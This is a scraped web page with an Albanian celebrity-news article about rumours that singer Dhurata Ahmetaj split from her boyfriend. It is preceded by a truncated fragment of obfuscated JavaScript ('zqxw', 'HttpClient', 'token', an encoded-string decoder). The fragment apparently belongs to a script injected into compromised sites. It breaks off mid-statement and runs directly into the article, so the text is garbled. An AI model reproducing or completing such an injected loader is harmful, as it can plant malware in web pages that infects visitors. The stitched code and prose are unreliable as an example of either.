;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A i dha fund lidhjes me të dashurin Dhurata Ahmetaj ?!

By

Një mish-mash u krijua fundin e vitit të kaluar kur në media vërshoi lajmi se Dhurata Ahmetaj është ndarë nga i dashuri i saj.

Nuk u kuptua asgjë konkretisht pasiqë me gjithë fotot që e demantuan një zhvillim të tillë, në media nën petkun e burimeve vazhdohej t’i mëshohej idesë se çifti më nuk janë bashkë.

E një sqarim, megjithëse në mënyrë indirekte e ka dhënë vetë këngëtarja në intervistën për Prive.

Ajo deklaroi se në të kaluarën ekspozimi i madh në rrjete sociale nuk i ka rezultuar si veprim i duhur prandaj tashmë në këtë pjesë tregohet më e rezervuar.

Megjithëse jo me një përgjigjje të prerë nga protagonistja, mësohet se dyshja vazhdojnë të jenë bashkë me njëri-tjetrin pavarësisht raportimeve në shtyp.

Se Dhurata ka zbuluar shumë nga lidhja e saj tregon fakti se në rrjete sociale, ajo madje dikur kishte postuar edhe vendin ku u takua për herë të parë.

‘Mësimin’ nga kjo eksperiencë, dhe vendimin për të qenë ‘hermetike’ këngëtarja e tregon më detajisht në intervistën e mëposhtme. /PRIVE.AL/

Artikuj të ngjashëm